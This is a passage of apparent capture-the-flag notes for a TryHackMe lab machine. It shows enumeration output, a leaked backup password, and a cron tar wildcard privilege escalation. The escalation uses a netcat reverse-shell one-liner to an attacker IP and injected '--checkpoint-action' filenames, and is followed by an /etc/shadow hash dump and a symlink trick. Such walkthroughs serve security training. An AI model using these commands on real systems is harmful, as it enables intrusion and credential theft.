/var/www/html/src/featured_grid/assets/style.css
/var/www/html/src/featured_grid/load.php
/var/www/html/src/featured_grid/package.json
/var/www/html/src/ganalytics
/var/www/html/src/ganalytics/load.php
/var/www/html/src/ganalytics/package.json
/var/www/html/src/gila_fb_comments
/var/www/html/src/gila_fb_comments/load.php
/var/www/html/src/gila_fb_comments/package.json
/var/www/html/src/reCAPTCHA
/var/www/html/src/reCAPTCHA/load.php
/var/www/html/src/reCAPTCHA/package.json
/var/www/html/themes
/var/www/html/themes/.htaccess
/var/www/html/themes/gila-blog
/var/www/html/themes/gila-blog/LICENSE
/var/www/html/themes/gila-blog/blocks-display-head.php
/var/www/html/themes/gila-blog/blog-category.php
/var/www/html/themes/gila-blog/blog-list.php
/var/www/html/themes/gila-blog/blog-tag.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/themes/gila-mag
/var/www/html/themes/gila-mag/LICENSE
/var/www/html/themes/gila-mag/blocks-display-head.php
/var/www/html/themes/gila-mag/blog-list.php
/var/www/html/themes/gila-mag/blog-tag.php
/var/www/html/themes/gila-mag/footer.php
#)You_can_write_even_more_files_inside_last_directory
/var/www/html/tmp
/var/www/html/tmp/.htaccess
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group www-data:
/tmp/linpeas.sh
╔══════════╣ Searching passwords in config PHP files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/opt/.password.bak
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/validate_password.so
/usr/share/help-langpack/en_AU/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_AU/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_AU/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_GB/evince/password.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_GB/zenity/password.page
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/icons/Humanity/apps/24/password.png
/usr/share/icons/Humanity/apps/48/password.svg
/usr/share/icons/Humanity/status/16/dialog-password.png
/usr/share/icons/Humanity/status/24/dialog-password.png
/usr/share/icons/Humanity/status/48/dialog-password.svg
/usr/share/locale-langpack/en_AU/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_AU/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/locale-langpack/en_CA/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/src/core/views/login-change-password.php
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
base-passwd depends on libc6 (>= 2.8); however:
base-passwd depends on libdebconfclient0 (>= 0.145); however:
2019-02-26 23:58:11 configure base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:11 install base-passwd:amd64 <none> 3.5.39
2019-02-26 23:58:11 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 upgrade base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:19 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:22 configure base-passwd:amd64 3.5.39 <none>
2019-02-26 23:58:22 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:28 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
2019-02-26 23:58:28 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:08 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
2019-02-26 23:59:09 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
Description: Set up users and passwords
Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.39) ...
Setting up passwd (1:4.2-3.1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.39) ...
Unpacking base-passwd (3.5.39) over (3.5.39) ...
Unpacking passwd (1:4.2-3.1ubuntu5) ...
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
╔══════════╣ Executable files potentially added by user (limit 70)
2020-02-06+18:54:07.1196134090 /opt/.password.bak
www-data@cmess:/tmp$ tar -xzf andre_backup.tar.gz
www-data@cmess:/tmp$ cat note
cat note
Note to self.
Anything in here will be backed up!
www-data@cmess:/opt$ ls -lah
ls -lah
total 12K
drwxr-xr-x 2 root root 4.0K Feb 6 2020 .
drwxr-xr-x 22 root root 4.0K Feb 6 2020 ..
-rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
cat .password.bak
andres backup password
UQfsdCB7aAP6
www-data@cmess:/home$ su andre
su andre
Password: UQfsdCB7aAP6
andre@cmess:/home$ cd andre
cd andre
andre@cmess:~$ ls
ls
backup user.txt
andre@cmess:~$ cat user.txt
cat user.txt
thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}
andre@cmess:~$ cd backup
cd backup
andre@cmess:~/backup$ ls
ls
note
andre@cmess:~/backup$ cat note
cat note
Note to self.
Anything in here will be backed up!
andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
andre@cmess:~/backup$ sudo -l
sudo -l
[sudo] password for andre: UQfsdCB7aAP6
Sorry, user andre may not run sudo on cmess.
andre@cmess:~/backup$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.19.103 1338 >/tmp/f" > shell.sh
andre@cmess:~/backup$ echo ""> "--checkpoint-action=exec=sh shell.sh"
andre@cmess:~/backup$ echo ""> --checkpoint=1
andre@cmess:~/backup$ ls -l
ls -l
total 16
-rw-rw-r-- 1 andre andre 1 Mar 14 10:56 --checkpoint=1
-rw-rw-r-- 1 andre andre 1 Mar 14 10:56 --checkpoint-action=exec=sh shell.sh
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note
-rw-rw-r-- 1 andre andre 74 Mar 14 10:56 shell.sh
┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.105.35] 59904
sh: 0: can't access tty; job control turned off
# cd /root
# ls
root.txt
# cat root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
# cat /etc/shadow
root:$6$W.gDTDR8$XXB79ORIcggP9.Cl2HzbUfmdADUCasSD92e4HS2kjw5Y9AsTvFeKKbGfDFycsdXoYOhB7Da9mFPcca5a3DyKG1:18299:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18299:0:99999:7:::
uuidd:*:18299:0:99999:7:::
andre:$6$GeMRsVKt$KEQmO.oV7yzpLOVXjDXG/8M/rbw1bngT/VOoRQSn2saquzhMTMl5J8rstkFQ1QD3/dLFS1yAMqj1kbiQWYvQ8.:18299:0:99999:7:::
mysql:!:18299:0:99999:7:::
sshd:*:18299:0:99999:7:::
using symbolic links
Symbolic links, also known as soft links, are special types of files that point to another file or directory in the filesystem. Unlike hard links, symbolic links can span across different filesystems and can even link to files or directories that do not exist yet. Symbolic links are commonly used to create shortcuts or aliases to files or directories, or to link to shared resources across multiple systems.
For example, if you want to create a symbolic link named "mylink" in the current directory that points to a file named "myfile" in the same directory, you can use the following command:
ln -s myfile mylink
This will create a symbolic link named "mylink" that points to the "myfile" file. You can then use the "mylink" filename to access the "myfile" file.
andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
andre@cmess:~$ mv backup backup_bak
mv backup backup_bak
andre@cmess:~$ ls
ls
backup_bak user.txt
andre@cmess:~$ ln -s /root/ backup
ln -s /root/ backup
andre@cmess:~$ ls -lah
ls -lah
total 36K
drwxr-x--- 4 andre andre 4.0K Mar 14 11:07 .
drwxr-xr-x 3 root root 4.0K Feb 6 2020 ..
lrwxrwxrwx 1 andre andre 6 Mar 14 11:07 backup -> /root/
drwxr-x--- 2 andre andre 4.0K Mar 14 10:56 backup_bak
lrwxrwxrwx 1 root root 9 Feb 6 2020 .bash_history -> /dev/null
-rwxr-x--- 1 andre andre 220 Feb 6 2020 .bash_logout
-rwxr-x--- 1 andre andre 3.7K Feb 6 2020 .bashrc
drwxr-x--- 2 andre andre 4.0K Feb 6 2020 .cache
-rwxr-x--- 1 andre andre 655 Feb 6 2020 .profile
lrwxrwxrwx 1 root root 9 Feb 6 2020 .sudo_as_admin_successful -> /dev/null
-rwxr-x--- 1 andre andre 38 Feb 6 2020 user.txt
-rwxr-x--- 1 andre andre 635 Feb 9 2020 .viminfo
andre@cmess:~$ cd /tmp
cd /tmp
andre@cmess:/tmp$ tar -xvf andre_backup.tar.gz
tar -xvf andre_backup.tar.gz
root.txt
andre@cmess:/tmp$ cat root.txt
cat root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
Compromise this machine and obtain user.txt
Have you tried fuzzing for subdomains?
thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}
Escalate your privileges and obtain root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
[[Wekor]]
Last updated
